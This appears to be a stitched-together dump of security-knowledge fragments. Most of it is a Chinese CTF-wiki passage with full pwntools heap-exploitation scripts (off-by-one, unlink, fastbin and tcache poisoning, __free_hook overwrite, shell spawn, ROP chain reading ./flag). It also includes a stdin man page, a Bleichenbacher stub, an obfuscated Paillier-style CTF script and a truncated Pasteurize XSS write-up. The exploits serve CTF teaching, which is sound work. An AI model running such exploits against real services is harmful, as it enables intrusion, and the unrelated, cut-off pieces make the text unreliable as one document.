int(io.readline()[:-1]) io.readuntil(": ") book_name = io.readline()[:-1] io.readuntil(": ") book_des = io.readline()[:-1] io.readuntil(": ") book_author = io.readline()[:-1] return book_id, book_name, book_des, book_author def createname(name): io.readuntil("name: ") io.sendline(name) def changename(name): io.readuntil("> ") io.sendline("5") io.readuntil(": ") io.sendline(name) def editbook(book_id, new_des): io.readuntil("> ") io.sendline("3") io.readuntil(": ") io.writeline(str(book_id)) io.readuntil(": ") io.sendline(new_des) def deletebook(book_id): io.readuntil("> ") io.sendline("2") io.readuntil(": ") io.sendline(str(book_id)) createname("A" * 32) createbook(128, "a", 32, "a") createbook(0x21000, "a", 0x21000, "b") book_id_1, book_name, book_des, book_author = printbook(1) book1_addr = u64(book_author[32:32+6].ljust(8,'\x00')) log.success("book1_address:" + hex(book1_addr)) payload = p64(1) + p64(book1_addr + 0x38) + p64(book1_addr + 0x40) + p64(0xffff) editbook(book_id_1, payload) changename("A" * 32) book_id_1, book_name, book_des, book_author = printbook(1) book2_name_addr = u64(book_name.ljust(8,"\x00")) book2_des_addr = u64(book_des.ljust(8,"\x00")) log.success("book2 name addr:" + hex(book2_name_addr)) log.success("book2 des addr:" + hex(book2_des_addr)) libc_base = book2_des_addr - 0x5b9010 log.success("libc base:" + hex(libc_base)) free_hook = libc_base + libc.symbols["__free_hook"] one_gadget = libc_base + 0x4f322 # 0x4f2c5 0x10a38c 0x4f322 log.success("free_hook:" + hex(free_hook)) log.success("one_gadget:" + hex(one_gadget)) editbook(1, p64(free_hook) * 2) editbook(2, p64(one_gadget)) deletebook(2) io.interactive() ``` #### 简洁方案 在任意读写之后,另一种找到 libc 的方案其实是可以在进行任意读写之前首先造成 libc 地址被写在堆上,之后任意读将其读出来即可。 其中为找到 libc 所在的偏移,可以直接通过 gdb 调试,查看具体 libc 地址在堆上的位置即可,不用进行刻意计算。 exp 如下: ``` #! /usr/bin/env python2 # -*- coding: utf-8 -*- # vim:fenc=utf-8 import sys import os import os.path from pwn import * context(os='linux', arch='amd64', log_level='debug') if len(sys.argv) > 2: DEBUG = 0 HOST = sys.argv[1] PORT = int(sys.argv[2]) p = remote(HOST, PORT) else: DEBUG = 1 if len(sys.argv) == 2: PATH = sys.argv[1] p = process(PATH) def cmd(choice): p.recvuntil('> ') p.sendline(str(choice)) def create(book_size, book_name, desc_size, desc): cmd(1) p.recvuntil(': ') p.sendline(str(book_size)) p.recvuntil(': ') if len(book_name) == book_size: p.send(book_name) else: p.sendline(book_name) p.recvuntil(': ') p.sendline(str(desc_size)) p.recvuntil(': ') if len(desc) == desc_size: p.send(desc) else: p.sendline(desc) def remove(idx): cmd(2) p.recvuntil(': ') p.sendline(str(idx)) def edit(idx, desc): cmd(3) p.recvuntil(': ') p.sendline(str(idx)) p.recvuntil(': ') p.send(desc) def author_name(author): cmd(5) p.recvuntil(': ') p.send(author) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def main(): # Your exploit script goes here # leak heap address p.recvuntil('name: ') p.sendline('x' * (0x20 - 5) + 'leak:') create(0x20, 'tmp a', 0x20, 'b') # 1 cmd(4) p.recvuntil('Author: ') p.recvuntil('leak:') heap_leak = u64(p.recvline().strip().ljust(8, '\x00')) p.info('heap leak @ 0x%x' % heap_leak) heap_base = heap_leak - 0x1080 create(0x20, 'buf 1', 0x20, 'desc buf') # 2 create(0x20, 'buf 2', 0x20, 'desc buf 2') # 3 remove(2) remove(3) ptr = heap_base + 0x1180 payload = p64(0) + p64(0x101) + p64(ptr - 0x18) + p64(ptr - 0x10) + '\x00' * 0xe0 + p64(0x100) create(0x20, 'name', 0x108, 'overflow') # 4 create(0x20, 'name', 0x100 - 0x10, 'target') # 5 create(0x20, '/bin/sh\x00', 0x200, 'to arbitrary read write') # 6 edit(4, payload) # overflow remove(5) # unlink edit(4, p64(0x30) + p64(4) + p64(heap_base + 0x11a0) + p64(heap_base + 0x10c0) + '\n') def write_to(addr, content, size): edit(4, p64(addr) + p64(size + 0x100) + '\n') edit(6, content + '\n') def read_at(addr): edit(4, p64(addr) + '\n') cmd(4) p.recvuntil('Description: ') p.recvuntil('Description: ') p.recvuntil('Description: ') content = p.recvline()[:-1] p.info(content) return content libc_leak = u64(read_at(heap_base + 0x11e0).ljust(8, '\x00')) - 0x3c4b78 p.info('libc leak @ 0x%x' % libc_leak) write_to(libc_leak + libc.symbols['__free_hook'], p64(libc_leak + libc.symbols['system']), 0x10) remove(6) p.interactive() if __name__ == '__main__': main() ``` ## 实例 2 : plaidctf 2015 plaiddb ```shell ➜ 2015_plaidctf_datastore git:(master) file datastore datastore: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=1a031710225e93b0b5985477c73653846c352add, stripped ➜ 2015_plaidctf_datastore git:(master) checksec datastore [*] '/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/heap/example/off_by_one/2015_plaidctf_datastore/datastore' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled ➜ 2015_plaidctf_datastore git:(master) ``` 可以看出,该程序是 64 位动态链接的。保护全部开启。 ### 功能分析 关键数据结构: ``` struct Node { char *key; long data_size; char *data; struct Node *left; struct Node *right; long dummy; long dummy1; } ``` 主要使用了二叉树的结构来存储数据,具体存储过程其实并不影响利用。 功能函数需要注意的是 `getline` (自己实现的单行读取函数): ``` char *__fastcall getline(__int64 a1, __int64 a2) { char *v2; // r12 char *v3; // rbx size_t v4; // r14 char v5; // al char v6; // bp signed __int64 v7; // r13 char *v8; // rax v2 = (char *)malloc(8uLL); // 一开始使用 malloc(8) 进行分配 v3 = v2; v4 = malloc_usable_size(v2); // 计算了可用大小,例如对于 malloc(8) 来说,这里应该为24 while ( 1 ) { v5 = _IO_getc(stdin); v6 = v5; if ( v5 == -1 ) bye(); if ( v5 == 10 ) break; v7 = v3 - v2; if ( v4 <= v3 - v2 ) { v8 = (char *)realloc(v2, 2 * v4); // 大小不够是将可用大小乘二,进行 realloc v2 = v8; if ( !v8 ) { puts("FATAL: Out of memory"); exit(-1); } v3 = &v8[v7]; v4 = malloc_usable_size(v8); } *v3++ = v6; // <--- 漏洞所在,此时 v3 作为索引,指向了下一个位置,如果位置全部使用完毕则会指向下一个本应该不可写位置 } *v3 = 0; // <--- 漏洞所在。 off by one (NULL 字节溢出) return v2; } ``` 几个主要功能: ``` unsigned __int64 main_fn() { char v1[8]; // [rsp+0h] [rbp-18h] unsigned __int64 v2; // [rsp+8h] [rbp-10h] v2 = __readfsqword(0x28u); puts("PROMPT: Enter command:"); gets_checked(v1, 8LL); if ( !strcmp(v1, "GET\n") ) { cmd_get(); } else if ( !strcmp(v1, "PUT\n") ) { cmd_put(); } else if ( !strcmp(v1, "DUMP\n") ) { cmd_dump(); } else if ( !strcmp(v1, "DEL\n") ) { cmd_del(); } else { if ( !strcmp(v1, "EXIT\n") ) bye(); __printf_chk(1LL, "ERROR: '%s' is not a valid command.\n", v1); } return __readfsqword(0x28u) ^ v2; } ``` `dump` 和 `get` 都是用来读取内容,这样 `key` 和具体数据内容都可以读取,不太需要重点关注。重点关注 `put` 和 `del`: ``` __int64 __fastcall cmd_put() { __int64 v0; // rsi Node *row; // rbx unsigned __int64 sz; // rax char *v3; // rax __int64 v4; // rbp __int64 result; // rax __int64 v6; // [rsp+0h] [rbp-38h] unsigned __int64 v7; // [rsp+18h] [rbp-20h] v7 = __readfsqword(0x28u); row = (Node *)malloc(0x38uLL); if ( !row ) { puts("FATAL: Can't allocate a row"); exit(-1); } puts("PROMPT: Enter row key:"); row->key = getline((__int64)"PROMPT: Enter row key:", v0); puts("PROMPT: Enter data size:"); gets_checked((char *)&v6, 16LL); sz = strtoul((const char *)&v6, 0LL, 0); row->data_size = sz; v3 = (char *)malloc(sz); row->data = v3; if ( v3 ) { puts("PROMPT: Enter data:"); fread_checked(row->data, row->data_size); v4 = insert_node(row); if ( v4 ) { free(row->key); free(*(void **)(v4 + 16)); *(_QWORD *)(v4 + 8) = row->data_size; *(_QWORD *)(v4 + 16) = row->data; free(row); puts("INFO: Update successful."); } else { puts("INFO: Insert successful."); } result = __readfsqword(0x28u) ^ v7; } else { puts("ERROR: Can't store that much data."); free(row->key); free(row); } return result; } ``` 分配过程有: 1. malloc(0x38) (结构体) 2. getline (malloc 和 realloc) 3. malloc(size) 可控大小 4. 读入 size 字节内容 更复杂的部分我们可以之后在看是否会用到,也就是在 put 中用到的关于 `free` 的部分 对于删除来说,这个函数比较复杂,就不再详细解释。事实上只需要知道他是按照 key 来进行删除,key 则使用 `getline` 进行读取,如果没有该 key,则 `getline` 的部分不会被删除,有的话,就依次 `free` ### 漏洞利用分析 漏洞的位置在功能分析中已经指出来了,在 `getline` 当中,但是这个函数比较特殊的地方在于,它所分配的大小是逐渐增大的,通过可用大小乘二的方式增大,使用了 `realloc`,也就是说,我们想要触发这个漏洞,就需要满足特定大小的要求。 根据分配过程,满足的大小有: * 0x18 * 0x38 * 0x78 * 0xf8 * 0x1f8 * ... 这些大小都可以触发溢出。 现在我们就需要知道我们需要采用的具体利用方法了。首先 `off-by-one` 漏洞可以造成堆交叉,可以造成 libc 地址泄露,之后所要采用的利用方法,由于已经存在堆交叉,也就是可以形成 UAF ,可以使用 UAF 的常用方法。 UAF 漏洞最简单的方法当然是 fastbin attack 了,所以我采用了 fastbin attack。 到这里,我们就可以开始思考如何形成我们所需要的利用条件。`off-by-one`最终的效果是可以将一个释放状态的 smallbin chunk 或是 unsortedbin chunk 一直到被溢出 chunk 合并成一个大 chunk。也就是说: ``` +------------+ | | <-- free 的 unsortedbin 或是 smallbin chunk (因为此时 fd 和 bk 指向合法指针,才能够进行 unlink) +------------+ | ... | <-- 任意 chunk +------------+ | | <-- 进行溢出的 chunk +------------+ | vuln | <-- 被溢出的 chunk,大小为 0x_00 (例如 0x100, 0x200……) +------------+ ``` 在 `off-by-one` 利用后,以上出现的 chunk 都将被合并为一个释放状态的 chunk。这样中间任意 chunk 的位置如果是已被分配的,就可以造成 overlap 了。 按照我们的利用思路,结合题目 `getline` 函数通过 `malloc(8)` 再 `realloc` 的分配方式,我们需要: 1. 任意 chunk 位置至少有一个已经被分配,且可以读出数据的 chunk 来泄露 libc 地址 2. 进行溢出的 chunk 需要在最上方的 chunk 之前被分配,否则 `malloc(8)` 的时候会分配到最上方而不是进行溢出 chunk 应在的位置 3. 任意 chunk 位置至少还需要有一个已经被释放,且 size 为 0x71 的 chunk 来进行 fastbin attack 4. 所有 chunk 不应该被合并进 top,所以最下方应该有一个已经分配的 chunk 保证与 top chunk 的距离 5. 进行溢出的 chunk 大小应该属于 unsortedbin 或是 smallbin,不能为 fastbin,否则被释放之后,按照 `getline` 的分配方式,`malloc(8)` 无法分配在该位置 按照以上原则,我们可以思考出 chunk 的分布如下: ``` +------------+ | 1 | <-- free 的 size == 0x200 chunk +------------+ | 2 | <-- size == 0x60 fastbin chunk,已被分配,且可以读出数据 +------------+ | 5 | <-- size == 0x71 fastbin chunk,为 fastbin attack 做准备 +------------+ | 3 | <-- size == 0x1f8 free 状态的 smallbin/unsortedbin chunk +------------+ | 4 | <-- size == 0x101 被溢出 chunk +------------+ | X | <-- 任意分配后 chunk 防止 top 合并 +------------+ ``` 由于分配过程还有一些额外结构(结构体本身的分配和 `getline`),我们需要先释放出足够的 fastbin chunk 来避免结构体本身的分配对我们的过程造成影响。 在此之后,依次释放掉 5, 3, 1, 之后利用 `del` 输入时候的 `getline`,将 3 填满,造成 `off-by-one`,之后将 4 `free` 掉进行合并(伪造 `prev_size`),这样就有了一个交叉的堆结构了。 之后的过程就更加简单了,首先分配 1 的大小,使得 libc 地址被写到 2 里,就可以泄露出地址,然后将 5 分配出来,写入需要的内容,就可以 fastbin attack 了。 ### exploit 由于原 libc 为 2.19 版本,加载有一些奇怪的问题,较为麻烦,而本题没有用到 2.19 独有的特性,所以我采用了 2.23 的 libc 进行调试,版本为 ubuntu10。 ```python #! /usr/bin/env python2 # -*- coding: utf-8 -*- # vim:fenc=utf-8 import sys import os import os.path from pwn import * context(os='linux', arch='amd64', log_level='debug') if len(sys.argv) > 2: DEBUG = 0 HOST = sys.argv[1] PORT = int(sys.argv[2]) p = remote(HOST, PORT) else: DEBUG = 1 if len(sys.argv) == 2: PATH = sys.argv[1] p = process(PATH) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') # ubuntu 16.04 def cmd(command_num): p.recvuntil('command:') p.sendline(str(command_num)) def put(key, size, data): cmd('PUT') p.recvuntil('key:') p.sendline(key) p.recvuntil('size:') p.sendline(str(size)) p.recvuntil('data:') if len(data) < size: p.send(data.ljust(size, '\x00')) else: p.send(data) def delete(key): cmd('DEL') p.recvuntil('key:') p.sendline(key) def get(key): cmd('GET') p.recvuntil('key:') p.sendline(key) p.recvuntil('[') num = int(p.recvuntil(' bytes').strip(' bytes')) p.recvuntil(':\n') return p.recv(num) def main(): # avoid complicity of structure malloc for i in range(10): put(str(i), 0x38, str(i)) for i in range(10): delete(str(i)) # allocate what we want in order put('1', 0x200, '1') put('2', 0x50, '2') put('5', 0x68, '6') put('3', 0x1f8, '3') put('4', 0xf0, '4') put('defense', 0x400, 'defense-data') # free those need to be freed delete('5') delete('3') delete('1') delete('a' * 0x1f0 + p64(0x4e0)) delete('4') put('0x200', 0x200, 'fillup') put('0x200 fillup', 0x200, 'fillup again') libc_leak = u64(get('2')[:6].ljust(8, '\x00')) p.info('libc leak: 0x%x' % libc_leak) libc_base = libc_leak - 0x3c4b78 p.info('libc_base: 0x%x' % libc_base) put('fastatk', 0x100, 'a' * 0x58 + p64(0x71) + p64(libc_base + libc.symbols['__malloc_hook'] - 0x10 + 5 - 8)) put('prepare', 0x68, 'prepare data') one_gadget = libc_base + 0x4526a put('attack', 0x68, 'a' * 3 + p64(one_gadget)) p.sendline('DEL') # malloc(8) triggers one_gadget p.interactive() if __name__ == '__main__': main() ``` ## 实例 3 : Balsn_CTF_2019-PlainText ### 漏洞利用分析 程序的流程比较清晰简单,在 add 函数中,存在明显的 off-by-null。 而 free 中对被 free 的指针进行了置空,导致无法直接 show,而程序对我们的输入末尾附加 `\x00`,也无法使用释放再申请的方法,leak 比较困难。 分析结束。接下来进行利用 为了调试方便,建议先关闭 aslr。 一开始的时候 bin 中非常的杂乱,先把这些乱七八糟的东西申请出来 ```python for i in range(16): add(0x10,'fill') for i in range(16): add(0x60,'fill') for i in range(9): add(0x70,'fill') for i in range(5): add(0xC0,'fill') for i in range(2): add(0xE0,'fill') add(0x170,'fill') add(0x190,'fill') # 49 ``` 由于我们部分覆写的时候会被附加一个 `\x00`,所以需要调整堆地址,为了调试方便,我选择这样调整,具体原因马上说 ```python add(0x2A50,'addralign') # 50 ``` 然后进行堆布局 首先申请出一个较大的堆块,释放掉,再申请一个更大的堆块,让被释放的堆块进入 large bin ```python add(0xFF8,'large bin') # 51 add(0x18,'protect') # 52 delete(51) add(0x2000,'push to large bin') # 51 ``` 由于之前进行的堆地址调整,在我的 gdb 中,该 large bin 的低地址的低 16 位就都是 0 了(这也就是之前堆地址调整时那样调整的原因。当然这只是在调试的情况下,实际打的时候只有低 12 位能保证为零,需要爆破 4 位,概率 1/16)。 然后进行这样的布局 ```python add(0x28,p64(0) + p64(0x241) + '\x28') # 53 fd->bk : 0xA0 - 0x18 add(0x28,'pass-loss control') # 54 add(0xF8,'pass') # 55 add(0x28,'pass') # 56 add(0x28,'pass') # 57 add(0x28,'pass') # 58 add(0x28,'pass') # 59 add(0x28,'pass-loss control') # 60 add(0x4F8,'to be off-by-null') # 61 ``` 形成的效果就是上面这张图的样子。其中 chunk A 完成了对 fake chunk 的 size 和 fd,bk 指针的布局。其中 fd 将指向 `&chunk_B - 0x18`并且破坏了 largebin 的 fd,之后我们会修复这个 fd 并使之指向 fake chunk。 由于 fake chunk 的 fd 指向 `&chunk_B - 0x18`,我们希望 chunk B 的 fd 指向 fake chunk。所以我们需要先把它 free 掉再申请回来,然后部分覆写 fd 来实现。 chunk E 存在的意义是抬高堆地址,使之后 leak 堆地址的时候可以全部输出。 在 chunk E 和 chunk C 中夹了一些 chunk,这些 chunk 会被 overlapping,便于之后继续利用了,建议多夹一些,免得后来发现不够用。 chunk C 未来会用来对 chunk D off-by-null,然后 free chunk D 的时候就可以向地址和并了。 --- fake chunk 的 size 已经被修改好,我们不希望在修复 large bin 的 fd 的同时把这个 size 破坏掉,所以必须把 chunk A free 到 fastbin 中。也需要把 chunk B 和 chunk C free 掉,并且希望 chunk B 的 fd 指针指向一个堆地址,部分覆写后就可以使之指向 fake_chunk 了。 ```python for i in range(7): add(0x28,'tcache') for i in range(7): delete(61 + 1 + i) delete(54) delete(60) delete(53) for i in range(7): add(0x28,'tcache') # 53,54,60,62,63,64,65 add(0x28,'\x10') # 53->66 ## stashed ## add(0x28,'\x10') # 54->67 add(0x28,'a' * 0x20 + p64(0x240)) # 60->68 delete(61) ``` 就是这样,先把 Tcache 填满,然后依次 free chunk B C A,再把 Tcache 清空,然后申请回 chunk A,部分覆写,使 fd 指向 fake_chunk。 然后由于 Tcache 的 stash 机制,chunk B C 进入 Tcache,再申请回来的就是 chunk B,部分覆写使 fd 指向 fake_chunk。 然后申请回 chunk C,进行 off-by-null。 free chunk D,成功实现 chunk overlapping。 然后进行 leak,需要把堆地址和 libc 地址都 leak 出来,leak 的方法有许多,这里提供一种(这种方法肯定不是最好的方法,但是可以完成 leak 就行) ``` add(0x140,'pass') # 61 show(56) libc_base = u64(sh.recv(6).ljust(0x8,'\x00')) - libc.sym["__malloc_hook"] - 0x10 - 0x60 log.success("libc_base:" + hex(libc_base)) __free_hook_addr = libc_base + libc.sym["__free_hook"] add(0x28,'pass') # 69<-56 add(0x28,'pass') # 70<-57 delete(70) delete(69) show(56) heap_base = u64(sh.recv(6).ljust(0x8,'\x00')) - 0x1A0 log.success("heap_base:" + hex(heap_base)) ``` 然后进行 Tcache poisoning(这里我被卡了一小会,主要原因是一直想着通过 double free 来实现,这种想法确实挺蠢的,需要注意,Tcache poisoning 的利用只需要控制 next 指针就可以了,double free 往往是实现控制的方法,而不是必须,在本题有更好的方法,就不需要 double free 了)。 ``` add(0x28,p64(0) * 2) # 69<-56 add(0x28,p64(0) * 2) # 70<-57 add(0x28,p64(0) * 2) # 71<-58 delete(68) add(0x60,p64(0) * 5 + p64(0x31) + p64(__free_hook_addr)) # 68 add(0x28,'pass') # 72 ## alloc to __free_hook ## magic_gadget = libc_base + 0x12be97 add(0x28,p64(magic_gadget)) # 73 ``` 因为有 chunk overlapping,所以其实挺容易控制 next 指针的,比如通过上面这样的方法就可以分配到 __free_hook 了。 到这里就结束了堆上的利用,之后需要进行白名单绕过,具体方法这里不再赘述,请见《沙箱逃逸》目录下的《C 沙盒逃逸》 ### exp ```python #!/usr/bin/env python # coding=utf-8 from pwn import * context.terminal = ["tmux","splitw","-h"] context.log_level = 'debug' #sh = process("./note") #libc = ELF("/glibc/2.29/64/lib/libc.so.6") sh = process("./note-re") libc = ELF("./libc-2.29.so") def add(size,payload): sh.sendlineafter("Choice: ",'1') sh.sendlineafter("Size: ",str(size)) sh.sendafter("Content: ",payload) def delete(index): sh.sendlineafter("Choice: ",'2') sh.sendlineafter("Idx: ",str(index)) def show(index): sh.sendlineafter("Choice: ",'3') sh.sendlineafter("Idx: ",str(index)) for i in range(16): add(0x10,'fill') for i in range(16): add(0x60,'fill') for i in range(9): add(0x70,'fill') for i in range(5): add(0xC0,'fill') for i in range(2): add(0xE0,'fill') add(0x170,'fill') add(0x190,'fill') # 49 add(0x2A50,'addralign') # 50 #add(0x4A50,'addralign') # 50 add(0xFF8,'large bin') # 51 add(0x18,'protect') # 52 delete(51) add(0x2000,'push to large bin') # 51 add(0x28,p64(0) + p64(0x241) + '\x28') # 53 fd->bk : 0xA0 - 0x18 add(0x28,'pass-loss control') # 54 add(0xF8,'pass') # 55 add(0x28,'pass') # 56 add(0x28,'pass') # 57 add(0x28,'pass') # 58 add(0x28,'pass') # 59 add(0x28,'pass-loss control') # 60 add(0x4F8,'to be off-by-null') # 61 for i in range(7): add(0x28,'tcache') for i in range(7): delete(61 + 1 + i) delete(54) delete(60) delete(53) for i in range(7): add(0x28,'tcache') # 53,54,60,62,63,64,65 add(0x28,'\x10') # 53->66 ## stashed ## add(0x28,'\x10') # 54->67 add(0x28,'a' * 0x20 + p64(0x240)) # 60->68 delete(61) add(0x140,'pass') # 61 show(56) libc_base = u64(sh.recv(6).ljust(0x8,'\x00')) - libc.sym["__malloc_hook"] - 0x10 - 0x60 log.success("libc_base:" + hex(libc_base)) __free_hook_addr = libc_base + libc.sym["__free_hook"] add(0x28,'pass') # 69<-56 add(0x28,'pass') # 70<-57 delete(70) delete(69) show(56) heap_base = u64(sh.recv(6).ljust(0x8,'\x00')) - 0x1A0 log.success("heap_base:" + hex(heap_base)) add(0x28,p64(0) * 2) # 69<-56 add(0x28,p64(0) * 2) # 70<-57 add(0x28,p64(0) * 2) # 71<-58 delete(68) add(0x60,p64(0) * 5 + p64(0x31) + p64(__free_hook_addr)) # 68 add(0x28,'pass') # 72 ## alloc to __free_hook ## magic_gadget = libc_base + 0x12be97 add(0x28,p64(magic_gadget)) # 73 pop_rdi_ret = libc_base + 0x26542 pop_rsi_ret = libc_base + 0x26f9e pop_rdx_ret = libc_base + 0x12bda6 syscall_ret = libc_base + 0xcf6c5 pop_rax_ret = libc_base + 0x47cf8 ret = libc_base + 0xc18ff payload_addr = heap_base + 0x270 str_flag_addr = heap_base + 0x270 + 5 * 0x8 + 0xB8 rw_addr = heap_base payload = p64(libc_base + 0x55E35) # rax payload += p64(payload_addr - 0xA0 + 0x10) # rdx payload += p64(payload_addr + 0x28) payload += p64(ret) payload += ''.ljust(0x8,'\x00') rop_chain = '' rop_chain += p64(pop_rdi_ret) + p64(str_flag_addr) # name = "./flag" rop_chain += p64(pop_rsi_ret) + p64(0) rop_chain += p64(pop_rdx_ret) + p64(0) rop_chain += p64(pop_rax_ret) + p64(2) + p64(syscall_ret) # sys_open rop_chain += p64(pop_rdi_ret) + p64(3) # fd = 3 rop_chain += p64(pop_rsi_ret) + p64(rw_addr) # buf rop_chain += p64(pop_rdx_ret) + p64(0x100) # len rop_chain += p64(libc_base + libc.symbols["read"]) rop_chain += p64(pop_rdi_ret) + p64(1) # fd = 1 rop_chain += p64(pop_rsi_ret) + p64(rw_addr) # buf rop_chain += p64(pop_rdx_ret) + p64(0x100) # len rop_chain += p64(libc_base + libc.symbols["write"]) payload += rop_chain payload += './flag\x00' add(len(payload) + 0x10,payload) # 74 #gdb.attach(proc.pidof(sh)[0]) delete(74) sh.interactive() ```
sec-knowleage
.\" From dholland@burgundy.eecs.harvard.edu Tue Mar 24 18:08:15 1998 .\" .\" This man page was written in 1998 by David A. Holland .\" and placed in the Public Domain. Polished a bit by aeb. .\" .Dd March 24, 1998 .Dt STDIN 3 .Os "Linux 2.0" .Sh NAME .Nm stdin , .Nm stdout , .Nm stderr .Nd 标准 I/O 流 .Sh "SYNOPSIS 总览" .Fd #include <stdio.h> .Fd extern FILE *stdin; .Fd extern FILE *stdout; .Fd extern FILE *stderr; .Sh "DESCRIPTION 描述" 通常,每个 Unix 程序在启动时都会打开三个流,一个用于输入,一个用于输出,一个用于打印诊断或错误消息。典型的,他们被连接到用户的终端 (参见 .Xr tty 4 ) 但是也有可能指向文件或是其他设备,取决于父进程选择设置了什么 (参见 .Xr sh 1 的重定向 (``Redirection'') 章节。) .Pp 输入流被称为 ``standard input''; 输出流被称为 ``standard output''; 错误流被称为 ``standard error''。这些名词通常简写为符号,用于引用这些文件,它们是 .Nm stdin , .Nm stdout , 和 .Nm stderr . .Pp 这些符号中,每一个都是 .Xr stdio 3 中的一个宏,类型是指向 FILE 的指针,可以用于类似 .Xr fprintf 3 或 .Xr fread 3 等函数中。 .Pp 由于 FILE 是一个对 Unix 文件描述符加以缓冲的包装,下层的文件也可以使用原始的 Unix 文件接口来存取。也就是,类似 .Xr read 2 和 .Xr lseek 2 的函数。与流 .Nm stdin , .Nm stdout , 和 .Nm stderr 关联的整数形式的文件描述符分别是 0,1 还有 2。预处理器符号 STDIN_FILENO,STDOUT_FILENO 和 STDERR_FILENO 分别以它们为值,定义在 <unistd.h> 中。 .Pp 注意混合使用 FILE 和原始的文件描述符可能带来不可预料的结果,一般应当避免。(对于喜欢追根问底的人:POSIX.1 规范的 8.2.3 节详细地描述了这样的混合使用怎样才能不出错。) 一个简单的规则是,文件描述符由内核控制,而 stdio 仅仅是一个库。它的意思是,例如当调用 exec 之后,子进程可以继承所有打开的文件描述符,但是任何原有的流都不可再存取了。 .Pp 由于符号 .Nm stdin , .Nm stdout , 和 .Nm stderr 被指定为宏,为它们赋值将导致不可移植。利用库函数 .Xr freopen 3 ,标准流可以用来指向不同的文件。引进这个函数专门用来为 .Nm stdin , .Nm stdout , 和 .Nm stderr 重新赋值。标准流在调用 .Xr exit 3 和程序正常中止时被关闭。 .Sh "SEE ALSO 参见" .Xr sh 1 , .Xr csh 1 , .Xr open 2 , .Xr fopen 3 , .Xr stdio 3 .Sh CONSIDERATIONS 错误流 .Nm stderr 是非缓冲的。输出流 .Nm stdout 是行缓冲的,如果它指向一个终端。不完全的行只有在调用 .Xr fflush 3 或 .Xr exit 3 ,或者打印了新行符之后才会显示。这样可能带来无法预料的结果,尤其是调试输出时。标准流 (或任何其他流) 的缓冲模式可以用函数 .Xr setbuf 3 或 .Xr setvbuf 3 来切换。注意当 .Nm stdin 与一个终端关联时,也许终端驱动中存在输入缓冲,与 stdio 缓冲完全无关。(确实如此,一般的终端输入在内核中是行缓冲的。) 内核对输入的控制可以通过对 .Xr tcsetattr 3 的调用来修改,参见 .Xr stty 1 , 和 .Xr termios 3 。 .Sh "CONFORMING TO 标准参考" 宏 .Nm stdin , .Nm stdout , 和 .Nm stderr 遵循 .St -ansiC 标准,这个标准同时规定了这三个流应当在程序启动时打开。
sec-knowleage
# Bleichenbacher's attack - PKCS 1.5 标准中可以伪造 RSA 签名​ !!! warning 待补充。 - http://ddaa.tw/gctf_crypto_201_rsa_ctf_challenge.html
sec-knowleage
from random import choice from sys import argv from base64 import b64encode b = 22 def dwfregrgre(x, z): wdef = [] for a in range(x, z + 1): for i in range(2, a): if (a % i) == 0: break else: wdef.append(a) return wdef def sdsd(edefefef): fvfegve = [x for x in range(2, edefefef)] x = 2 rrerrrr = True while rrerrrr: for i in range(x * x, edefefef, x): if i in fvfegve: fvfegve.remove(i) rrerrrr = False for i in fvfegve: if i > x: x = i rrerrrr = True break return fvfegve def swsdwd(a, b): if a == 0: return (b, 0, 1) else: g, y, x = swsdwd(b % a, a) return (g, x - (b // a) * y, y) def swsdwdwdwa(a, m): g, x, y = swsdwd(a, m) if g != 1: raise Exception('Oops! Error!') else: return x % m def L(u, n): return (u - 1) // n if __name__ == '__main__': print("Key cryptor v1.0") if len(argv) != 2: print("Start script like: python crypt.py <YourOwnPasswordString>") if (not str(argv[1]).startswith("KLCTF{")) or (not str(argv[1]).endswith("}")): print("Error! Password must starts with KLCTF") exit() p = choice(dwfregrgre(100, 1000)) q = choice(dwfregrgre(200, 1000)) print("Waiting for encryption...") n = p * q g = None for i in range(n + 1, n * n): if ((i % p) == 0) or ((i % q) == 0) or ((i % n) == 0): continue g = i break if g is None: print("Error! Can't find g!") exit() lamb = (p - 1) * (q - 1) mu = swsdwdwdwa(L(pow(g, lamb, n * n), n), n) % n rc = sdsd(n - 1) if len(rc) == 0: print("Error! Candidates for r not found!") exit() if p in rc: rc.remove(p) if q in rc: rc.remove(q) r = choice(rc) wdwfewgwggrgrg = [ord(x) for x in argv[1][6:-1]] dcew = (pow(g, b, (n * n)) * pow(r, n, (n * n))) % (n * n) for i in range(len(wdwfewgwggrgrg)): wdwfewgwggrgrg[i] = (((pow(g, wdwfewgwggrgrg[i], (n * n)) * pow(r, n, (n * n))) % (n * n)) * dcew) % (n * n) wdwfewgwggrgrg[i] = (L(pow(wdwfewgwggrgrg[i], lamb, (n * n)), n) * mu) % n wdwfewgwggrgrg = b64encode(bytearray(wdwfewgwggrgrg)) print(str(wdwfewgwggrgrg)[2:-1])
sec-knowleage
# Pasteurize Category: Web > This doesn't look secure. I wouldn't put even the littlest secret in here. My source tells me that third parties might have implanted it with their little treats already. Can you prove me right? ## Solution We visit the attached link and get a simple form where we can enter some text: ```html <div class="container w-50 pt-5"> <h3>Create new paste</h3> <form class="form" method="post"> <textarea class="form-control" name="content"></textarea> <input type="submit" class="mt-3 btn btn-primary btn-block" value="Submit"> </form> </div> <a href="/source" style="display:none">Source</a> ``` We also get a hidden link to "/source" which we'll return to in a moment. Once we submit the form, we arrive to a new page where the text is displayed. ```html <div class="card-header"> <a id="note-title" class="card-title"></a> </div> <div class="card-body"> <div id="note-content"></div> </div> ``` The div is populated via Javascript: ```javascript <!-- TODO: Fix b/1337 in /source that could lead to XSS --> <script> const note = "Test"; const note_id = "213615b7-7538-4d66-8bca-b3b063c081d5"; const note_el = document.getElementById('note-content'); const note_url_el = document.getElementById('note-title'); const clean = DOMPurify.sanitize(note); note_el.innerHTML = clean; note_url_el.href = `/${note_id}`; note_url_el.innerHTML = `${note_id}`; </script> ``` There's also a button which allows to share the post with the admin: ```html <button type="submit" class="btn btn-link col-md-6 border-right">share with TJMike🎤</button> ``` Notice the comment, pointing again to `/source`. Time to check it out: ```javascript const express = require('express'); const bodyParser = require('body-parser'); const utils = require('./utils'); const Recaptcha = require('express-recaptcha').RecaptchaV3; const uuidv4 = require('uuid').v4; const Datastore = require('@google-cloud/datastore').Datastore; /* Just reCAPTCHA stuff. */ const 